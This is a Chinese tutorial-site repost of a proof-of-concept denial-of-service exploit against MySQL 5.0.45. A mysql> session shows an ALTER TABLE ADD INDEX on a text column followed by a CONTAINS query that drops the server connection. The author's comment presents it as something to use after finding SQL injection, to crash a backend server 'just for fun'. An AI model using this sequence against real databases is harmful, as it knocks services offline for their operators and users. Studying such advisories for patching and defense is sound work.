Mysql必读mysql 5.0.45 (修改)拒绝服务漏洞
发布时间:2020-12-12 01:02:59 所属栏目:MySql教程 来源:网络整理
导读:《Mysql必读mysql 5.0.45 (修改)拒绝服务漏洞》要点: 本文介绍了Mysql必读mysql 5.0.45 (修改)拒绝服务漏洞,希望对您有用。如果有疑问,可以联系我们。 mysql 5.0.45 (修改)拒绝服务漏洞 /* * MySQL =6.0 possibly affected * Kristian Erik Hermansen
|
《Mysql必读mysql 5.0.45 (修改)拒绝服务漏洞》要点: /* * MySQL <=6.0 possibly affected * Kristian Erik Hermansen * Credit: Joe Gallo * You must have Alter permissions to exploit this bug! * Scenario: You found SQL injection,but you want to punch backend server * in the nuts just for fun. Start with the Alter TABLE statement on * a table and field you know to exist. The first two SQL statements are * simply to demostrate reproducibility... */ <snip> mysql> Create TABLE `test` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY, `foo` text NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; Query OK,0 rows affected mysql> Select * FROM test Where CONTAINS(foo,''bar''); Empty set mysql> Alter TABLE test ADD INDEX (foo(100)); Query OK,0 rows affected Records: 0 Duplicates: 0 Warnings: 0 mysql> Select * FROM test Where CONTAINS(foo,''bar''); ERROR 2013 : Lost connection to MySQL server during query </snip> (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |